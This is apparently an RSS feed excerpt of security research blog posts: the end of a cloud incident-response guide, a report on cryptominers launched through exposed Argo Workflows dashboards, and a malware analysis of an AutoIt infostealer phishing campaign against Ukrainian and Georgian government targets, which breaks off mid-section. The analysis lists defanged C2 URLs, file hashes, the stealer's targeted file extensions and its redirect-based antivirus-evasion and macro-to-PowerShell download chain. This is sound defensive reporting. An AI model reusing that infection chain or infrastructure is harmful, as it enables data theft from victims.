&lt;li&gt;&lt;a href="https://github.com/OpenCSPM/opencspm"target="_blank" rel="noopener"&gt;OpenCSPM&lt;/a&gt;, an open-source project that
provides visibility over the configuration of the cloud infrastructure.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Patch Vulnerabilities and Install System Updates&lt;span class="hx:absolute hx:-mt-20" id="patch-vulnerabilities-and-install-system-updates"&gt;&lt;/span&gt;
&lt;a href="#patch-vulnerabilities-and-install-system-updates" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Keeping all the components of your cloud environment updated and patched can
prevent attacks from happening in the first place. There are several
open-source projects, such as &lt;a href="https://github.com/future-architect/vuls"target="_blank" rel="noopener"&gt;Vuls&lt;/a&gt;,
&lt;a href="https://www.openvas.org/"target="_blank" rel="noopener"&gt;OpenVAS&lt;/a&gt;, and
&lt;a href="https://github.com/XTLS/Xray-core"target="_blank" rel="noopener"&gt;Xray&lt;/a&gt;, that can be used for vulnerability
scanning.&lt;/p&gt;
&lt;h3&gt;Detection and Analysis&lt;span class="hx:absolute hx:-mt-20" id="detection-and-analysis"&gt;&lt;/span&gt;
&lt;a href="#detection-and-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;So if you&amp;rsquo;ve done everything you can to reduce the likelihood of an attack,
where do you start when one happens? First, collect all of the information that
indicates that an incident is occurring in the system, including logs, IP
addresses, affected accounts, virtual images of the victim hosts, commands and
scripts that are being executed, and so on. Next, analyze the evidence to
better understand the incident and how you should respond to it. For example,
let&amp;rsquo;s assume you got an alert on the creation of several new AWS instances. The
first thing to check is the CloudTrial logs, where you&amp;rsquo;ll find RunInstances
events as shown in Figure 2 below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/08/guide-to-digital-forensics-incident-response-in-the-cloud/images/fig2.png" title="Figure 2: AWS CloudTrail logs showing RunInstances events" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: AWS CloudTrail logs showing RunInstances events&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;After you isolate the instances and connect securely (not from your personal
computer), you find a suspicious file in the &lt;code&gt;/tmp/kdevtmpfsi&lt;/code&gt; directory. After
extracting the file from the machine either you or the threat analysis team
will analyze the file and the events that led to the execution of the malware
in an attempt to understand the threat and the damage to the environment. This
process may take a long time especially for sophisticated threats.&lt;/p&gt;
&lt;h3&gt;Containment, Eradication, and Recovery&lt;span class="hx:absolute hx:-mt-20" id="containment-eradication-and-recovery"&gt;&lt;/span&gt;
&lt;a href="#containment-eradication-and-recovery" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The next stage in the process involves:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Identifying and isolating the hosts or containers that were attacked to
prevent the attack from spreading in the network.&lt;/li&gt;
&lt;li&gt;Making a snapshot/copy of the instance and the volume that was attacked to
preserve the evidence. Preserving the evidence is important for investigation
of the incident. It will help you learn how the attackers got into the
system, find compromised hosts, and understand the attack flow.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Post Incident&lt;span class="hx:absolute hx:-mt-20" id="post-incident"&gt;&lt;/span&gt;
&lt;a href="#post-incident" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Once the incident is over:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Complete an incident response report and share it with relevant stakeholders
in the organization so they can read and understand it. It&amp;rsquo;s important to
document the investigation and findings to prevent similar events in the
future, improve the incident response process, and to fix and add security
measures.&lt;/li&gt;
&lt;li&gt;Learn the kill chain of the attack based on the evidence you gathered, and
monitor your systems for post-incident activity.&lt;/li&gt;
&lt;li&gt;If the incident was caused by misconfigurations or vulnerabilities, make sure
to patch and fix them.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Getting Started&lt;span class="hx:absolute hx:-mt-20" id="getting-started"&gt;&lt;/span&gt;
&lt;a href="#getting-started" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Developing a reliable incident response process in cloud environments is a
complicated and challenging task, with many factors that need to be taken into
account. Even with the precautions detailed in this blog, breaches still
happen—whether due to unknown vulnerabilities/misconfigurations, unauthorized
access, or supply chain attacks. Having strong runtime threat detection and
response capabilities is crucial.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Special thanks to Aner Izraeli for contributing to this post.&lt;/em&gt;&lt;/p&gt;</description></item><item><title>New Attacks on Kubernetes via Misconfigured Argo Workflows</title><link>https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/</link><pubDate>Tue, 20 Jul 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/</guid><description>
&lt;h2&gt;Key Points&lt;span class="hx:absolute hx:-mt-20" id="key-points"&gt;&lt;/span&gt;
&lt;a href="#key-points" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Intezer has detected a new attack vector against Kubernetes (K8s) clusters
via misconfigured Argo Workflows instances.&lt;/li&gt;
&lt;li&gt;Attackers are already taking advantage of this vector as we detected
operators dropping cryptominers using this method in the wild.&lt;/li&gt;
&lt;li&gt;We have identified infected nodes and there is the potential for larger scale
attacks due to hundreds of misconfigured deployments. We have detected
exposed instances of Argo Workflows that belong to companies from different
sectors including technology, finance and logistics.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/argoproj/argo-workflows"target="_blank" rel="noopener"&gt;Argo Workflows&lt;/a&gt; is an
open-source, container-native workflow engine designed to run on K8s
clusters.&lt;/li&gt;
&lt;li&gt;Argo Workflows instances with misconfigured permissions allow threat actors
to run unauthorized code on the victim&amp;rsquo;s environment.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Overview&lt;span class="hx:absolute hx:-mt-20" id="overview"&gt;&lt;/span&gt;
&lt;a href="#overview" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Kubernetes (K8s) is revolutionizing the cloud computing environment, having
become the most popular platform for container orchestration. It is also one of
the most popular repositories on
&lt;a href="https://github.com/kubernetes/kubernetes"target="_blank" rel="noopener"&gt;GitHub&lt;/a&gt;, with over 100,000 commits
and over 3,000 contributors. Each year there is a steady increase in
enterprises using Kubernetes and the number of clusters they deploy. According
to the Cloud Native Computing Foundation (CNCF)
&lt;a href="https://www.cncf.io//srv/htdocs/wp-content/uploads/2020/11/CNCF_Survey_Report_2020.pdf"target="_blank" rel="noopener"&gt;2020 survey&lt;/a&gt;,
91% of respondents are using Kubernetes, compared to 78% in 2019 and 58% in
2018. In the same survey, it was reported that among the top challenges of
using and deploying containers were complexity, security and lack of training.&lt;/p&gt;
&lt;p&gt;With these challenges that enterprises face using containers and K8s clusters,
there has never been a greater opportunity for attackers to exploit weaknesses
in security. Applications such as &amp;ldquo;Argo Workflows&amp;rdquo; orchestrate parallel jobs in
Kubernetes by providing a friendly user interface and the ability to run CI/CD
pipelines without having to configure &amp;ldquo;complex software development products.&amp;rdquo;
The application is &lt;a href="https://argoproj.github.io/argo-workflows/"target="_blank" rel="noopener"&gt;marketed&lt;/a&gt; to
&amp;ldquo;Easily run compute intensive jobs for machine learning or data processing in a
fraction of the time using Argo Workflows on Kubernetes.&amp;rdquo; Even with products
like Argo helping to reduce the complexity of deployment, there is still always
the possibility of misconfiguration or exploitation.&lt;/p&gt;
&lt;p&gt;Recently, while studying the impact of exposed Argo Workflows instances, we
discovered a number of unprotected instances, operated by companies in several
industries including technology, finance and logistics. Exposed instances can
contain sensitive information such as code, credentials and private container
image names. We also discovered that in many instances, permissions are
configured which allow any visiting user to deploy workflows. We also detected
that some misconfigured nodes are being targeted by threat actors. An example
of an attack found in the wild, launching a popular cryptocurrency miner
container, is described later in this blog.&lt;/p&gt;
&lt;h2&gt;Argo Overview&lt;span class="hx:absolute hx:-mt-20" id="argo-overview"&gt;&lt;/span&gt;
&lt;a href="#argo-overview" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The core resource in Argo is the &amp;ldquo;Workflow.&amp;rdquo; The workflow is defined using a
YAML file containing a &lt;code&gt;spec&lt;/code&gt; for the type of work to be performed. Most
commonly, each step in an Argo workflow is a container. An example &amp;ldquo;Hello
World&amp;rdquo; workflow is shown below:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;These workflows are executed from a template or submitted directly through the
Argo user interface, as shown below:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/images/fig2.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h2&gt;How Argo is Abused by Attackers&lt;span class="hx:absolute hx:-mt-20" id="how-argo-is-abused-by-attackers"&gt;&lt;/span&gt;
&lt;a href="#how-argo-is-abused-by-attackers" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In instances when permissions are misconfigured, it is possible for an attacker
to access an open Argo dashboard and submit their own workflow. In one cluster,
we noticed that a popular cryptocurrency mining container,
&lt;code&gt;kannix/monero-miner&lt;/code&gt;, was being deployed. An example of an in the wild attack,
still running on an exposed cluster for nine months, is shown below.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/images/fig3.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/images/fig4.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;kannix/monero-miner&lt;/code&gt; (now removed from Docker Hub) was a popular image
which used XMRig to mine for Monero cryptocurrency. Its ease of use allowed it
to be conveniently used by threat actors of any skill level to conduct
cryptojacking; since all that was required was to change the address of who the
mined cryptocurrency would be deposited to. This same container was mentioned
in a blog post by
&lt;a href="https://azure.microsoft.com/en-us/blog/detect-largescale-cryptocurrency-mining-attack-against-kubernetes-clusters/"target="_blank" rel="noopener"&gt;Azure Security Center&lt;/a&gt;,
which stated that this container was used in a large-scale cryptocurrency
mining attack against Kubernetes clusters.&lt;/p&gt;
&lt;p&gt;In Docker Hub there are still a number of options for Monero mining that
attackers can use. With a simple search it shows that there are at least 45
other containers with millions of downloads.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/images/fig5.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Using another popular container, &lt;code&gt;giansalex/monero-miner&lt;/code&gt;, we detected an XMRig
Miner running on the cluster via Argo Workflows.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/images/fig6.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;h2&gt;Mitigation Advice&lt;span class="hx:absolute hx:-mt-20" id="mitigation-advice"&gt;&lt;/span&gt;
&lt;a href="#mitigation-advice" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;For a quick check that an instance is misconfigured, try accessing the Argo
Workflows dashboard from an unauthenticated incognito browser outside your
corporate environment. Another option is to query the API of your instance and
check the status code. Make a HTTP GET request to
&lt;code&gt;[your.instance:port]/api/v1/info&lt;/code&gt;. A returned HTTP status code of
&lt;code&gt;401 Unauthorized&lt;/code&gt; while being an unauthenticated user will indicate a
correctly configured instance, whereas a successful status code of
&lt;code&gt;200 Success&lt;/code&gt; could indicate that an unauthorized user is able to access the
instance.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;It is critical to ensure that best practices for permissions are followed in
order to prevent unauthorized activity in your environments. Methodologies such
as the
&lt;a href="https://www.cyberark.com/what-is/least-privilege/"target="_blank" rel="noopener"&gt;principle of least privilege&lt;/a&gt;
(PoLP) should be followed and always refer to the
&lt;a href="https://argoproj.github.io/argo-workflows/security/"target="_blank" rel="noopener"&gt;application documentation&lt;/a&gt;
for best practices on security.&lt;/p&gt;
&lt;p&gt;Even if your cluster is deployed on a
&lt;a href="https://intezer.com/blog/container-security/do-you-really-need-kubernetes/"target="_blank" rel="noopener"&gt;managed cloud Kubernetes service&lt;/a&gt;
such as Amazon Web Services (AWS), EKS or Azure Kubernetes Service (AKS), the
shared responsibility model still states that the cloud customer, not the cloud
provider, is responsible for taking care of all necessary security
configurations for the applications they deploy.&lt;/p&gt;
&lt;p&gt;If you suspect that your Argo instance has been misconfigured and exposed to
the internet with excessive permissions, check for any suspicious activity in
the logs and in the workflow timeline. Make sure that there are no workflows
that have been running for an excessive amount of time. This might be an
indicator of a cryptominer running on your cluster. You can also check out our
article on
&lt;a href="https://intezer.com/blog/cloud-security/best-practices-for-securing-a-kubernetes-environment/"target="_blank" rel="noopener"&gt;best practices for securing your Kubernetes environment&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Runtime Protection for Kubernetes Security&lt;span class="hx:absolute hx:-mt-20" id="runtime-protection-for-kubernetes-security"&gt;&lt;/span&gt;
&lt;a href="#runtime-protection-for-kubernetes-security" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;It is impossible to completely remove all vulnerabilities or misconfigurations
in cloud applications deployed by any entity. New attack vectors,
vulnerabilities and misconfigurations are being detected and exploited all the
time. Therefore, it is important to have a safety net that can always ensure
that only trusted code is running in your environment. In the event that an
attacker has exploited a misconfiguration or vulnerability in your K8s cluster
or applications running on clusters, runtime protection solutions give
immediate visibility over all code running on your pods, nodes, and clusters,
and help you detect and respond to attacks in your environment.&lt;/p&gt;</description></item><item><title>Targeted Phishing Attack against Ukrainian Government Expands to Georgia</title><link>https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/</link><pubDate>Wed, 14 Jul 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/</guid><description>
&lt;p&gt;In May 2021,
&lt;a href="https://www.fortinet.com/blog/threat-research/spearphishing-attack-uses-covid-21-lure-to-target-ukrainian-government"target="_blank" rel="noopener"&gt;Fortinet published a report&lt;/a&gt;
about the early stages of an ongoing phishing attack against the Ukrainian
government. The attack, initially based on the
&lt;a href="https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/"target="_blank" rel="noopener"&gt;Saint Bot downloader&lt;/a&gt;,
also targeted Georgia as reported by Malwarebytes. Since June we have seen this
threat actor expand its operation with new samples targeting government
entities in Georgia. In this report we will cover the new malware samples we
found.&lt;/p&gt;
&lt;h2&gt;Method of Infection&lt;span class="hx:absolute hx:-mt-20" id="method-of-infection"&gt;&lt;/span&gt;
&lt;a href="#method-of-infection" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The attack&amp;rsquo;s entry point is a spear phishing email referencing
government-related topics including veterans, Ukraine&amp;rsquo;s Anti-Terrorist
Operation (ATO), Georgia&amp;rsquo;s Internally Displaced Persons (IDPs), organizations
in Georgia&amp;rsquo;s private sector and COVID-19. The attack mainly targets government
agencies in Ukraine and Georgia.&lt;/p&gt;
&lt;h2&gt;The Malware&lt;span class="hx:absolute hx:-mt-20" id="the-malware"&gt;&lt;/span&gt;
&lt;a href="#the-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The main payload delivered by the malware is an infostealer written in AutoIt.
Its main goal is to steal files from the victim&amp;rsquo;s machine, uploading them to a
predefined Command and control (C2) server.&lt;/p&gt;
&lt;p&gt;Based on victimology and the fact that this attack tries to steal files from
government entities, a classic goal of nation-state groups, it is likely
operated by a Russian nation-state. There are also several similarities between
this attack and past APT28 campaigns which we will discuss later.&lt;/p&gt;
&lt;p&gt;Below we summarize the early stages of the attack and show the latest malware
targeting government entities in Georgia. We assess with high confidence that
this attack may expand its operations to target additional Eastern European
countries.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The attack flow, described below, begins with a phishing email containing a
malicious shortened URL. The URL redirects to a Command and control (C2) where
a ZIP file or malicious document is hosted. The ZIP file contains a malicious
file and in some emails also a harmless PDF file. The malicious attachment
varies between RTF, DOC, PDF, JS, LNK or EXE. Its main goal is to drop the
packed payloads from the C2. The method in which a dropper contacts the C2 in
order to deliver the packed payload varies between the different file types and
stages of the attack. The packed executable loads an AutoIt payload into
memory. The payload searches for files on the victim&amp;rsquo;s machine based on a list
of file extensions and uploads them to a C2 that is hardcoded in the script.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig1.png" title="Attack flow." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Attack flow.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;An example of one of the phishing emails sent to the Ukrainian government is
below. The threat actor references payments made to veterans of the
Anti-Terrorist Operation (ATO).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig2.png" title="Phishing email sent to the Ukrainian government. Translation from Ukrainian – Subject: Payments to ATO Veterans. Content: It must be filled in and sent back." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Phishing email sent to the Ukrainian government. Translation from Ukrainian – Subject: Payments to ATO Veterans. Content: It must be filled in and sent back.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The link, masqueraded as a Ukrainian .gov domain, is actually a shortened URL
(&lt;code&gt;https[://]cutt[.]ly/WcBTVdf&lt;/code&gt;) which contacts
&lt;code&gt;http[://]gosloto[.]site/doc/form_request.doc&lt;/code&gt; and downloads &lt;code&gt;form_request.doc&lt;/code&gt;
to the victim&amp;rsquo;s machine. This document is an RTF file that once runs will
present content related to the Israeli
&lt;a href="https://en.wikipedia.org/wiki/Merkava"target="_blank" rel="noopener"&gt;Merkava&lt;/a&gt;, the main battle tank used by
the Israeli Defense Forces.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig3.png" title="Reference to Israeli Merkava in the RTF file." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Reference to Israeli Merkava in the RTF file.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This file is incharge of dropping the final payload from the C2. In other
phishing emails, this file is named &lt;code&gt;NATO_06042021&lt;/code&gt;
(&lt;code&gt;44697aad796c0d82c1adbee15fd1266b&lt;/code&gt;).&lt;/p&gt;
&lt;h3&gt;First we Take Kyiv, then we Take Tbilisi&lt;span class="hx:absolute hx:-mt-20" id="first-we-take-kyiv-then-we-take-tbilisi"&gt;&lt;/span&gt;
&lt;a href="#first-we-take-kyiv-then-we-take-tbilisi" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Combined with continuous attacks against Ukraine, the threat actor has expanded
its campaign to target government entities in Georgia. The following malicious
documents were uploaded to VirusTotal from Georgia on June 17 and July 5.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;b56975725c4e260370af540f9c0b6709&lt;/code&gt; —
&lt;code&gt;Georgia_Private_Sector_Poster_Inputs_06_2021.pdf&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;900e892c8151f0f59a93af1206583ce6&lt;/code&gt; —
&lt;code&gt;2021-2022 Strategy Action Plan for IDPs.doc&lt;/code&gt; (translated from Georgian)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;333796e18eb3f3d1529d07ec90c63e61&lt;/code&gt; — &lt;code&gt;Change to 828.doc&lt;/code&gt; (translated from
Georgian)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All three files have low detection rates in VirusTotal at the time of this
writing. In the following sections we will describe each file&amp;rsquo;s behavior.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig4.png" title="b56975725c4e260370af540f9c0b6709 in VirusTotal." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;b56975725c4e260370af540f9c0b6709 in VirusTotal.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;The PDF File&lt;span class="hx:absolute hx:-mt-20" id="the-pdf-file"&gt;&lt;/span&gt;
&lt;a href="#the-pdf-file" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The PDF file, named &lt;code&gt;Georgia_Private_Sector_Poster_Inputs_06_2021.pdf&lt;/code&gt;, was
uploaded to VirusTotal on June 17, 2021. The PDF contains an action object.
Upon a victim opening the PDF it will send a query to Google containing the C2:
&lt;code&gt;http://www[.]google[.]com/url?q=http%3A%2F%2F93482432493824792343432843240234327488 92349702394023.xyz&amp;amp;sa=D&amp;amp;sntz=1&amp;amp;usg=AFQjCNFWmVffgSGlrrv-2U9sSOJYzfUQqw&lt;/code&gt;)
The system will prompt a security warning allowing the document to contact
&lt;code&gt;http[:]//www.google.com&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig5.png" title="Action object in b56975725c4e260370af540f9c0b6709" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Action object in b56975725c4e260370af540f9c0b6709&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig6.png" title="System prompt message." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;System prompt message.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Once the document connects to Google a short series of network redirections
occurs. First, Google will redirect to the C2&amp;rsquo;s URL. Then, as described in the
image below, the C2 contains a frame with an src to another C2 URL
(&lt;code&gt;https[://]16868138130[.]space/000/&lt;/code&gt;), which then redirects to a shortened URL
(&lt;code&gt;https[://]qaz[.]im/load/rKtsZD/hDKKFD&lt;/code&gt;) using a meta refresh redirect. This
will finally drop &lt;code&gt;georgia_private_sector_poster_inputs_06_2021.cpl&lt;/code&gt;
(&lt;code&gt;02f0118bd15dabf727659b9fd27c86c9&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig7.png" title="Network redirections for delivering the payload." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Network redirections for delivering the payload.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This redirection process, starting with Google as the first domain the PDF
attempts to access, is an obvious Antivirus evasion technique.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;georgia_private_sector_poster_inputs_06_2021.cpl&lt;/code&gt; is a DLL which upon clicking
on it, runs under a trusted control panel process. The DLL is incharge of
dropping and running the packed payload from the C2,
&lt;code&gt;16868138130[.]space/000/000.exe&lt;/code&gt; (&lt;code&gt;41af4d9fbd0bc719212b78cd7a1b89ec&lt;/code&gt;). The
packed malware loads the AutoIt payload into memory.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig8.png" title="Genetic report of 02f0118bd15dabf727659b9fd27c86c9. Drops 41af4d9fbd0bc719212b78cd7a1b89ec which loads AutoIt into memory." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Genetic report of 02f0118bd15dabf727659b9fd27c86c9. Drops 41af4d9fbd0bc719212b78cd7a1b89ec which loads AutoIt into memory.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig9.png" title="IoC report of 02f0118bd15dabf727659b9fd27c86c9 in Intezer Analyze." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;IoC report of 02f0118bd15dabf727659b9fd27c86c9 in Intezer Analyze.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The
&lt;a href="https://github.com/intezer/community-intellignce/blob/master/AutoIt_Infostealer_GE_UA.txt"target="_blank" rel="noopener"&gt;AutoIt script&amp;rsquo;s&lt;/a&gt;
main goal is to upload files from the victim&amp;rsquo;s machine to a predefined C2. The
main logic (see image below) calls the &lt;code&gt;_filsearch&lt;/code&gt; function (two images below)
which looks for files containing the following extensions:
&lt;code&gt;*.doc;*.pdf;*.ppt;*.dot;*.xl;*.csv;*.rtf;*.dot;*.mdb;*.accdb;*.pot;*.pps;*.ppa;*.rar;*.zip;*.tar;*.7z;*.txt&lt;/code&gt;.
&lt;code&gt;_filsearch&lt;/code&gt; uses &lt;code&gt;@ComSpec&lt;/code&gt; environment variable (which usually points to
CMD). The process tree created by the AutoIt file is below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig10.png" title="Code snippet from the AutoIt script main logic." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Code snippet from the AutoIt script main logic.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig11.png" title="Code snippet from the AutoIt script _filsearch function." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Code snippet from the AutoIt script _filsearch function.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig12.png" title="Process tree snippet in Intezer Analyze." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Process tree snippet in Intezer Analyze.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Each file is uploaded to the C2 via a multipart/form-data POST request. The
file&amp;rsquo;s directory is sent as Hex. Below is an example of a file upload request.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig13.png" title="Example of C_/Users/admin/AppData/Roaming/Microsoft/Windows/Cookies/NUT28OOW.txt file upload." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Example of C_/Users/admin/AppData/Roaming/Microsoft/Windows/Cookies/NUT28OOW.txt file upload.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Lastly, the AutoIt script creates and runs a batch named &lt;code&gt;r.bat&lt;/code&gt; which deletes
the malware from disk and kills the process.&lt;/p&gt;
&lt;h4&gt;The Document Files&lt;span class="hx:absolute hx:-mt-20" id="the-document-files"&gt;&lt;/span&gt;
&lt;a href="#the-document-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Both malicious Word documents uploaded to VirusTotal on July 5 display similar
behavior. Let&amp;rsquo;s look at &lt;code&gt;900e892c8151f0f59a93af1206583ce6&lt;/code&gt;. Once a user opens
this document, it will run a VBA macro with the main logic to create, write to
and run a batch file named &lt;code&gt;ballDemocrat.bat&lt;/code&gt;. The script written to the batch
file will run a PowerShell command that drops an executable from the C2
(&lt;code&gt;http[://]1221[.]site/15858415841/0407.exe&lt;/code&gt;) and saves it as
&lt;code&gt;centuryarticle.exe&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/images/fig14.png" title="VBA script (7546f382d73231a4c1fdc58ab1535ec0) in the malicious document." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;VBA script (7546f382d73231a4c1fdc58ab1535ec0) in the malicious document.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
